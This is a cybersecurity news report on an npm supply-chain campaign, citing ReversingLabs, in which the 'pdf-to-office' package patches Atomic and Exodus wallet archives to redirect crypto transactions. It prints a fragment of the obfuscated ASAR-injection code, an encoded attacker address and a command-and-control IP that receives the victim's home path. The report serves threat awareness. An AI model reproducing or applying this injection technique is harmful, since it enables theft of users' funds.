Cybersecurity researchers have uncovered a sophisticated malware campaign targeting cryptocurrency users through compromised npm packages.The attack specifically targets users of Atomic and Exodus wallets, hijacking transactions by injecting malicious code that redirects funds to attacker-controlled addresses.This latest campaign represents an escalation in the ongoing targeting of cryptocurrency users through software supply chain attacks.The attack begins when developers unknowingly install compromised [npm packages](https://cybersecuritynews.com/new-malicious-npm-packages-attack-amazon-slack/) in their projects.One such package identified in this campaign is ‘pdf-to-office,’ which appears legitimate but contains hidden malicious functionality.Once installed, the package examines the user’s system for installed [cryptocurrency wallets](https://cybersecuritynews.com/cryptocore-cryptocurrency-scam-draining-wallets/) and injects malicious code that can intercept and redirect transactions without the user’s knowledge.The impact of this attack is potentially devastating for victims, as it can silently redirect cryptocurrency transactions to attacker-controlled wallets across multiple cryptocurrencies including [Ethereum](https://cybersecuritynews.com/beginner-ethereum-tips/), Tron-based USDT, XRP, and Solana.The malware effectively hijacks transactions by replacing legitimate wallet addresses with encoded attacker addresses at the moment users attempt to send funds.ReversingLabs researchers [identified](https://www.reversinglabs.com/blog/atomic-and-exodus-crypto-wallets-targeted-in-malicious-npm-campaign) this campaign through their analysis of suspicious npm packages, noting multiple telltale signs of malicious behavior including suspicious URL connections and code patterns similar to previously identified malicious packages.Their analysis revealed that the attackers are deploying sophisticated techniques to maintain persistence and evade detection.Technical examination reveals a multi-stage attack that begins with package installation and proceeds through wallet identification, file extraction, code injection, and ultimately transaction hijacking.The attackers use [obfuscation](https://cybersecuritynews.com/malware-obfuscation/) techniques to hide their true intentions, making detection challenging for traditional security tools.**Infection Mechanism and Code Injection**——————————————The malware’s infection process begins when the malicious package executes its payload targeting installed wallet software. .webp) Malicious payload (Source — Reversing Labs)The malicious code first identifies the location of the wallet’s application files on the system and then targets the ASAR package format used by Electron-based applications.The code specifically searches for files in paths such as ‘AppData/Local/Programs/atomic/resources/app.asar’.Once located, the malware extracts the application archive, injects its malicious code, and then repacks the archive.The following code snippet illustrates this process:- const _0x3b6acf = path.join(_0x3pbact, ‘dist’, ‘electron’); if (fs.existsSync(_0x59578f)) { await fs.mkdir(_0x3b6acf, { ‘recursive’: true }); await asar.extractAll(_0x59578f, _0x3b6acf); await fs.copyFile(_0x190a5b, _0x2e871a); await fs.copyFile(_0x1a4254, _0xf71fca); await asar.createPackage(_0x3b6acf, _0x59578f); await fs.rm(_0x3b6acf, { ‘recursive’: true, ‘force’: true });The injection targets specific JavaScript files within the wallet software, particularly vendor files like ‘vendors.64b69c3b00e2a7914733.js’. .webp) The difference between a legitimate and trojanized file (Source — Reversing Labs)The malware modifies transaction handling code to replace legitimate wallet addresses with attacker-controlled ones using base64 encoding.For example, when a user attempts to send ETH, the code replaces the recipient address with a decoded version of ‘MHg0N2V1MEU4MUY10URiMjdGMDM0ZjRlYjEwRjk5MTIzMGY2NmY1M2ZB’-[1-].After completing the infection, the malware communicates with a command-and-control server at 178.156.149.109, sending installation status information including the user’s home directory path.This allows attackers to track successful infections and potentially gather additional information about compromised systems.**Find this News Interesting! Follow us on [Google News](https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&gl=IN&ceid=IN:en), [LinkedIn](https://www.linkedin.com/company/cybersecurity-news/), -& [X](https://x.com/The_Cyber_News) to Get Instant Updates!**### **Also Read:**> [Laboratory Services Cooperative Data Breach — 1.6 Million People Impacted](https://cybersecuritynews.com/laboratory-services-cooperative-data-breach/)The post [Threat Actors Hijack Legitimate Crypto Packages to Inject Malicious Code](https://cybersecuritynews.com/threat-actors-hijack-legitimate-crypto-packages/) appeared first on [Cyber Security News](https://cybersecuritynews.com).
Related Tags:
NAICS: 54 – Professional
Scientific
Technical Services
NAICS: 541 – Professional
Scientific
Technical Services
NAICS: 52 – Finance And Insurance
NAICS: 518 – Computing Infrastructure Providers
Data Processing
Web Hosting
Related Services
NAICS: 523 – Securities
Commodity Contracts
Other Financial Investments And Related Activities
NAICS: 51 – Information
Blog: Cybersecurity News
TA0003 – Persistence
File and Directory Discovery
Associated Indicators:
null